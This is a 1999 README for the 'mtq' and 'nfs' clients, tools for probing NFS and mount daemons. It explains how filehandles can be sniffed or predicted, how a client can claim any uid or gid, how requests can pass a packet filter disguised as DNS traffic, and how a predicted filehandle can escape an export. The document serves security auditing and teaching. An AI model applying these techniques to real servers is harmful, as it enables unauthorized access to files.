******************************* NFS and MOUNTD protocol clients ******************************* Author: Jefferson Ogata (JO317) Date: 1999/06/08 The principle aims of these programs are to: - Allow systems administrators to discover, through exploration, how secure various implementations and applications of NFS are. - Assess NFS implementations for specific vulnerabilities. - Provide a starting point for programmers wishing to understand NFS. I've long wondered at how well NFS is implemented in various operating systems I've worked with. But because the normal way of using NFS puts a kernel and several programs between the user and the protocol, I haven't been able to assess security to my satisfaction. I wrote these programs with security testing in mind. I was quickly rewarded with several discoveries. Here are a few examples: - IRIX mountd leaks information about the existence of files. This could be tested with the mount program on a remote machine, but doing so requires root access. mtq allows you to test this behavior as an unprivileged user. Solaris 2.5.1 has this same problem. - Prediction of IRIX filehandles is feasible, especially if you already have a filehandle for an inode on the same physical device, in which case it's almost trivial. - Linux NFS has completely predictable filehandles (use the source, Luke), but performs numerous access checks throughout the NFS daemon, in an attempt to render predictability unhelpful. This is slower but safer. - Solaris 2.5.1 and IRIX allow access to objects that have unsearchable paths. If you have a filehandle for a directory, the permissions of the path to the directory are ignored. ************************************** A Brief Summary Of NFS Security Issues ************************************** RPC The mount and NFS protocols are remote procedure call (RPC) services. RPC is a system developed by Sun for making procedure calls between hosts of differing architectures. To account for byte-order and word-size differences, RPC was built on an underlying protocol called external data representation (XDR), which standardizes sizes of data types, and the manner in which data are serialized for transmission over a network. Each RPC program receives a unique program number, e.g. NFS is program 100003. The program number, along with a version number, is used to identify a particular UDP or TCP port on a remote machine that has that program bound to it. This requires an intermediate program -- the RPC portmapper, also known as rpcbind. The portmapper acts as an index for all the RPC programs running on a given host. As an RPC service daemon starts up, it binds a port -- usually one assigned by the operating system -- and then informs the portmapper what port it is attached to. The portmapper itself is an RPC program (number 100000), and other RPC programs communicate with it via the RPC mechanism. Since the portmapper is itself an RPC service, we now have a chicken and egg problem: how do programs know where to reach the portmapper? The answer is that unlike most RPC services, which rely on the operating system to allocate a port for them from those available, the portmapper chooses the port to listen to explicitly: TCP and UDP ports 111. When an RPC program wants to communicate with the RPC portmapper, it contacts this well-known port directly. NFS also runs typically on a well-known port: 2049. The interface to an RPC program can be described by a high-level language, in which the argument and result data structures and procedure calls used by the service can be described easily. Such descriptions are usually found in a file with a .x extension, e.g. mount.x, and the Unix tool rpcgen is used to compile a .x file into a collection of client, server, and XDR routines. This makes RPC programming relatively easy. RPC SECURITY Securing RPC services is a hassle. The trouble is that each time an RPC program starts up, it may be bound to a different port. This makes it difficult to set up a centralized packet-filtering firewall to keep bozos off of your RPC services. One thing you can do is to secure your portmapper. Run Wietse Venema's secure portmapper for this. It allows you to restrict access to portmap services to a limited set of hosts. But this only buys you so much. An attacker is still free to go completely around the portmapper and use a portscanner or trial-and-error to locate your RPC services. You should still secure your portmapper though, to avoid leaking information about what services you are running. If the attacker doesn't know for sure you're running NFS, he may well go someplace else. You can secure most NFS servers by filtering traffic for port 2049 (both TCP and UDP). This will help significantly, although it still leaves you vulnerable to attacks that exploit RPC-forwarding mechanisms. Certain RPC programs, e.g. rpc.statd, have the ability to forward RPC requests. This means that if an attacker can contact rpc.statd, he may be able to get it to forward the RPC request to the NFS daemon on localhost. This will bypass your centralized firewall completely. Keep an eye out for updates and advisories regarding all RPC programs, and keep a close inventory on which RPC programs you run on your host. Turn off all those that are not strictly necessary. Another thing you can do is block all incoming UDP and all but selected TCP connections. This breaks a lot of things, such as passive FTP, DNS, Corba. You can leave holes for DNS, but someone might exploit them to sneak traffic to your RPC services by making it come from port 53. RPC, like FTP, creates a lot of problems in the security arena, specifically because it doesn't play friendly with packet filters. FILEHANDLES NFS and mountd use filehandles. A filehandle is a (supposedly) opaque data structure that allows an NFS server to locate a unique object. Unlike a filesystem path, a filehandle isn't supposed to be intelligible to the client; the client can't, for example, remove the last component of a filehandle and come up with a filehandle for a parent directory. The filehandle for an object's parent directory may be difficult or impossible for the client to predict. A filehandle may refer to any type of NFS object: a regular file, a directory, symbolic link, etc. For directories, an RPC is provided by the server for enumerating their contents, which are a list of object names. The client traverses NFS paths one component at a time using RPCs that take directory filehandles as arguments. Thus it isn't necessary for a client to know how the server's filesystem is constructed, or whether it uses a / to separate components of a pathname. Everything is simply a filehandle. If, for example, filehandle D refers to a directory, you may call the READDIR RPC with D as an argument to enumerate the contents of the directory. The result will be a list of object names. For each name, then, you can call the LOOKUP RPC to acquire the filehandle for the corresponding object. The READDIR RPC, incidentally, returns a file identifier with each filename, which is typically the inode number of the file on its underlying filesystem. STATELESSNESS One of the goals of NFS server implementation is to make it possible for NFS clients to survive a reboot of the server and resume their NFS operations transparently when the server is again available. For this to be feasible, NFS filehandles cannot change with a server reboot; they must be time-invariant. In addition, an NFS server does not know how many file descriptors a client has open on a given filehandle. This also means that filehandles must be time-invariant. For example, suppose a client has mounted a filesystem from a local network server and has several files open when the server crashes. Unable to talk to the server, the client hangs until the server comes back up. At this point, the client can resume its NFS operations transparently and none of the processes accessing NFS objects on the server will be informed of the server's reboot. To implement NFS with this goal, filehandles cannot be dynamic entities, such as indices into a table of open NFS files in kernel memory. Using a table strategy would invalidate all existing filehandles every time the server reboots. Instead, implementors come up with techniques for embedding enough information about the file into each filehandle so that even after a reboot, the server can locate the file again. This is rendered particularly difficult by the fact that NFS filehandles are limited to 32 bytes in version 2, and 64 bytes in version 3. Thus there is not enough space to embed arbitrary path information in the filehandle. These factors -- invariance and limited size of filehandles -- have several repercussions on NFS security. The most straightforward way to allow filehandles to be invariant is to use each object's inode number on its underlying filesystem as a part of the filehandle. This unfortunately forces the NFS server to be able to map an inode number back to an object. This generally requires superuser access; therefore, such NFS servers cannot run as unprivileged processes. Furthermore, if an object is moved after a filehandle has been granted, permission to access the object remains intact to any client that knows the filehandle, even though the path to the object may no longer be searchable to the client. To make matters worse, it is not trivial to locate the path to an object given only its inode number -- in fact, there may be multiple paths requiring different credentials. In spite of all these drawbacks, this is the strategy most operating systems have chosen in their NFS implementations. The server could instead build a table of filehandle to path mappings and keep a copy on disk so that it would survive reboots. This, however, would require a way for the NFS server to be notified when an object is renamed using its native filesystem, since renaming the object would invalidate the path to the object and leave no hint where the object was moved to. The NFS server shipped with Red Hat Linux 5.2 does something similar: it builds its filehandles from a hashed path to each NFS object. This enables it to check permission to an object on each client access. But we still have the drawback that renaming a file invalidates its filehandles. As far as I know, no one has proposed a clean solution to all of these problems. Life goes on. THE MOUNT DAEMON We have another chicken and egg problem now: if you need a filehandle to find another filehandle, where does the first filehandle come from? Somehow a client needs to get an initial filehandle, which points to an exported directory the client has access to. This problem is handled by the mount daemon, which hands out initial filehandles to authorized clients. How the mount daemon decides what clients are authorized varies among implementations. Usually access is based on membership in lists of hosts by name or address, and sometimes on netgroups, which are lists of hosts, or sometimes lists of usernames. Generally mountd will enumerate the filesystems exported by its host at the request of any client at all. But for authorized clients, mountd will also hand out the filehandle for the directory that is the root of an exported filesystem. All future NFS operations on the filesystem are based, directly or indirectly, on this filehandle. NFS DAEMON SECURITY The invariance of NFS filehandles deeply limits the efficacy of the security mechanism provided by mountd. If you know the filehandle for an object, you don't need to ask mountd for it. There is typically no communication between mountd and the NFS daemon regarding what clients have been given filehandles by mountd. There are three basic strategies for getting a filehandle: 1. Ask the mount daemon or the NFS daemon for it as an authorized client. You don't necessarily have to be a privileged user on the client to do this -- most implementations don't care what port an NFS request comes from. 2. Sniff it off the network. 3. Predict it from information you know about the file. For example, if you know the inode number of the file and have a filehandle on the same filesystem, this may be quite easy. Once you have a filehandle, you can use it from anywhere on the Internet to identify the named object on the NFS server host. Keeping filehandles somehow a secret is very difficult. The result of all this is that in order for there to be any real security in an NFS implementation, authorization checks should be done not only by mountd, but also by the NFS daemon itself. What's more, these checks should be done on every NFS operation the client requests. This would affect performance, although authorization could be cached in hash tables. I keep writing in the subjunctive here because almost no NFS implementations do this; again, in the interest of simplicity and performance, most NFS daemons do very little to verify proper client credentials. Some don't even take the the IP address of the client into consideration, assuming quite absurdly that if the client knows the filehandle, the access must have been authenticated by the mount daemon. Let's elaborate on strategy 1 above (request the filehandle as an authorized client). Suppose an NFS server exports /home to all machines in an intranet. Later, IT gets it together and limits access to well- maintained Unix machines. The network is converted to perfect switches, and every machine is on its own wire. But what about all that time /home was exported to the whole intranet? If an attacker acquired a filehandle at that time, there's a good chance it's still valid. This is another pitfall of relying on obfuscation of filehandles as an NFS security measure. If this scenario happens and the NFS daemon isn't performing thorough access checks on NFS operations, the security of the system is illusory. What about strategy 3 (predicting filehandles)? Some implementations make it absolutely trivial to predict filehandles for objects you don't have access to, as long as you have at least one filehandle on the same filesystem and know the inode number of the object you want access to. Knowing the inode number may also be trivial: you may have read and search access to the object on its native filesystem, or you may use the NFS READDIR RPC to get the NFS file identifier, which is usually the inode number. Easy filehandle prediction is yet another repercussion of the strategy of using inode numbers to construct filehandles. Some implementations try to get around this, obfuscating the algorithm used to generate filehandles from inodes by performing some reversible mathematical operation on the filehandle before returning it to the client. This is a terribly weak measure, however, because it tempts the implementor to rely heavily on it and reduce the number of other authorization checks in the NFS daemon to improve performance. When the algorithm used to obfuscate the filehandles becomes known to the attacker, the overall security of the implementation is much lower than it would have been had the implementor made the filehandles easily predictable and secured the implementation in more robust ways. Here's an example of how filehandle prediction can work. Suppose that a directory /home is exported from a server, and that it contains a directory /home/opaque that is unsearchable by all. Within /home/opaque is a subdirectory /home/opaque/open that is writable by all. No one should be able to do anything with /home/opaque/open, because opaque is not searchable. Specifically, if an NFS client program calls the NFS LOOKUP RPC, giving it the filehandle for /home/opaque and the name "open", the server should refuse the request. All this means is that the server won't tell the client the filehandle for /home/opaque/open, and without a filehandle, there's no way for the client to operate on /home/opaque/open. But if an attacker can predict the filehandle for /home/opaque/open some other way, he might be able to go there directly. If the NFS daemon isn't checking the full path to the file a filehandle refers to, but is instead relying on the fact that it would theoretically refuse to give away the filehandle for /home/opaque/open, the directory is vulnerable. What's more, access through unauthorized filehandles can be very surreptitious. Many mount daemons will log unauthorized mount requests, but very few NFS daemons bother to log attempts to use unauthorized filehandles. This means that an attacker may hack away at your NFS server indefinitely without a single message appearing in a log file. *********************** The NFS Client Programs *********************** PROGRAM INVOCATION There are two programs here: mtq and nfs. Here are the arguments they have in common: -t Use TCP for RPC transport. The default is UDP. -p port Bind the local endpoint of the RPC transport to the specified port number. This might let you get through a packet filter by pretending your requests are DNS answers, for example. If you are using TCP transport, this option may not work, depending on your OS. -3 Use protocol version 3. The default is version 1 for mountd and version 2 for NFS. host[:port] Connect to service at the specified host. If the port is not specified, the portmapper on the target host will be consulted. mtq is a client for the mount daemon. Its other options are: -n Do not query for filehandles. The method used to retrieve filehandles is to call the MOUNTPROC_MNT RPC, which may cause the mount daemon to log a mount attempt. Use this option if you are interested solely in the list of exported filesystems and their host access lists. You could get the same information using showmount -e. The following options turn on Unix RPC authentication. This is pretty much meaningless, but it's there to test whether mount daemons care. If none of these options is specified, no authentication is used. -u uid Set the uid used in Unix authentication. -g gid Set the gid used in Unix authentication. -h host Set the hostname used in Unix authentication. nfs is a client for the NFS daemon. Its other options are: fh A filehandle represented as a hexadecimal string. nfs has an interactive interface that uses the readline library to provide a fully editable command line with command completion and a history mechanism. The program resembles a command-line FTP client, and maintains a current working directory on the NFS server. nfs does not mount the remote filesystem; it can act as a client of most NFS implementations without requiring root privileges or any filesystem support from the kernel, and since normal NFS authentication is completely a matter of trust between the client and the server, nfs can freely claim to have any uid or gid on the server that you prefer. Note that uid 0 and gid 0 are mapped by most servers to -2 to prevent trusting remote users as root. There is an exports(5) option to change this behavior on the server. After startup, nfs presents a command prompt, which indicates the current working directory on the remote NFS server, and the uid and gid that nfs is claiming for its identity. The commands nfs supports are as follows (type ? for a full list): atime time Set the access time that will be used when creating remote files. If no argument is given, the current time will be used, which is the default. A variety of time formats are supported. See the parseTime function in commands.c and the man page for strptime() for more info. cd dir Change remote working directory. chroot dir | ##filehandle Change root directory. If the root directory is given in the form ##filehandle, parses the given string and treats it as the filehandle of the new root. This is useful to test whether it is possible to escape outside NFS export directories using predicted filehandles. If you really want to chroot to a path that looks like ##filehandle, simply use "chroot ./##filehandle". exit Exit the program. EOF will do this also. fh file|dir [file|dir ...] Report the filehandles of the named objects. fi Report filesystem info. This RPC is only supported in NFS version 3. fs Report filesystem status. get file [file ...] Retrieve files into the local working directory. The copies in the local directory will have the same mode flags, mtimes, and atimes as the remote files. id [uid].[gid] Set identity uid and/or gid. Either may be omitted, e.g. "id .4" means change to group 4, leaving the uid unmodified. The uid and gid are initially set to the uid and gid of the client process. lcd dir Change local working directory. ls [file|dir ...] Does pretty much what you would expect of "ls -alinF". mkdir dir [dir ...] Creates a directory on the remote server. The mode flags of the directory are modified by the current umask (c.f. umask command). more file Retrieve a remote file and pipe it through the more command. mtime time Set the modification time that will be used when creating remote files. If no argument is given, the current time will be used, which is the default. A variety of time formats are supported. See the parseTime function in commands.c and the man page for strptime() for more info. mv [-x] [--] file1 file2 mv [-x] [--] file1 file2 ... dir mv [-x] [--] dir1 dir2 Behaves pretty much like normal mv. The -- option turns off any further flag parsing and may appear anywhere in the command; this allows you to rename a file named "--" or "-x". The -x flag is kind of tricky. First of all, it can occur anywhere in the command and it can occur multiple times. Each time it occurs it toggles a flag specifying whether to parse the remaining arguments as paths or to treat them as atomic names. If you, for example type mv a/b -x c/d then nfs will attempt to rename the file "b" within the directory "a" to a file called "c/d" in the current directory. Without the -x flag, it would instead try to rename the file "b" within the directory "a" to a file called "d" within the directory "c", which is the behavior you would expect normally. Before you go off thinking that this is a useless feature, let me explain that I added it because at an earlier point in developing this program I made a semantic error dealing with mv arguments and accidentally created a file called "a/b" on an NFS server. This is not possible on most NFS implementations, but the -x option gives you a way to find out. I had a hell of a time getting rid of the file -- no Unix utility could fix things -- so I tweaked the code enough to let me rename in back to something sane via NFS, and added the -x option for later testing. put file [file ...] Send files to the remote working directory. The copies in the remote directory will have the same mode flags, mtimes, and atimes as the local files. The uid and gid of the remote files will be the current uid and gid nfs is pretending to be. rm file [file ...] Removes the specified files. There's no local check on permissions (everything is -f), so be careful. rmdir dir [dir ...] Removes the specified directories. touch file [file ...] Creates an empty file. The mode flags of the file are modified by the current umask (c.f. umask). umask [mode] If no mode is specified, prints the current umask, which defaults to the umask of the process. The umask may be given as an octal value between 0 and 777, and that will become the new umask. The umask is only used to modify modes on the remote server. This command doesn't affect the process umask. !cmd Any local Unix shell command may be run by escaping it with an exclamation point. Such commands are executed via system(3). Command and filename completion is fairly intelligent. If you haven't typed part of a command name, completion is attempted only for the command name. If you have typed a command that takes a local object as an argument (e.g. put), completion considers local objects only, and if you have typed a command that takes a remote object as an argument, completion considers remote objects only. No completion is attempted for escaped shell commands. BUGS Under Solaris 2.6 using the Sun C compiler, the printf format specifier for 64-bit integer types does not appear to work. This causes bogus output from several commands. The problem does not exist under gcc. No doubt there are numerous other bugs. Please inform the author of any you encounter. If you can come up with a patch diff, more power to you!